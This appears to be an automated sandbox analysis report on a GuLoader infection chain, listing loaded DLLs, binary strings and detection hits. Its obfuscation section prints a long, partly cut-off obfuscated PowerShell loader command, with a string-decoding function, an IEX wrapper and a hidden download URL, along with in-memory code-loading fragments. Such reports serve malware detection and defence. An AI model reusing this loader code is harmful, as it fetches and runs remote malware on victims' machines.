                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbIn.1 source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb] source: powershell.exe, 00000003.00000002.2706218457.00000000077CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2681410204.000000000320A000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: POWERSHELL "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv ", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kimeridgian)$global:Pepperwort4 = [System.Text.Encoding]::ASCII.GetString($Produktudvikleres)$global:Scrutator=$Pepperwort4.substring($Bemandingers,$Baksningens)<#Uenigst Epipharynx
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Taagerne $Sagn $Velbehagelig), (Desorganiseringers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Coprophilic = [AppDomain]::CurrentDomain.GetAssemblies()
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Financivgr)), $Forcere).DefineDynamicModule($Semperannual, $false).DefineType($Dropsonde, $Threateningness, [System.MulticastDelegate]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kimeridgian)$global:Pepperwort4 = [System.Text.Encoding]::ASCII.GetString($Produktudvikleres)$global:Scrutator=$Pepperwort4.substring($Bemandingers,$Baksningens)<#Uenigst Epipharynx
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(BurnJump to behavior
                Source: 31437F.exe.8.drStatic PE information: section name: .didat
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9FE267 push ecx; ret 1_2_00007FFD9B9FE29A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9F0973 push E95B66D0h; ret 1_2_00007FFD9B9F09C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC44A4 push esi; retf 0001h1_2_00007FFD9BAC47C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC9447 push ecx; ret 1_2_00007FFD9BAC944A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5830 push es; ret 1_2_00007FFD9BAC5832
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC541D push es; ret 1_2_00007FFD9BAC544A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC9349 push edx; ret 1_2_00007FFD9BAC934A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5E97 push es; ret 1_2_00007FFD9BAC5E9A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5AC1 push es; ret 1_2_00007FFD9BAC5AC2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC4E59 push ebx; ret 1_2_00007FFD9BAC4F5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5A24 push es; ret 1_2_00007FFD9BAC5A25
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5DD9 push es; ret 1_2_00007FFD9BAC5DDA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC4DC9 push ebx; ret 1_2_00007FFD9BAC4F5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAC5D33 push es; ret 1_2_00007FFD9BAC5D34
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04C83262 push cs; iretd 3_2_04C8326F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F614C push edx; iretd 3_2_095F6155
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F01D1 pushfd ; iretd 3_2_095F01D6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F4055 push 0000002Eh; iretd 3_2_095F405D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F035A push B2EB6E41h; iretd 3_2_095F0377
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F4BBA push es; retf 3_2_095F4C40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F1A4F push eax; retf 3_2_095F1A51
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F5A76 push F9C03BA9h; iretd 3_2_095F5A91
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F5AAC pushfd ; iretd 3_2_095F5AC5
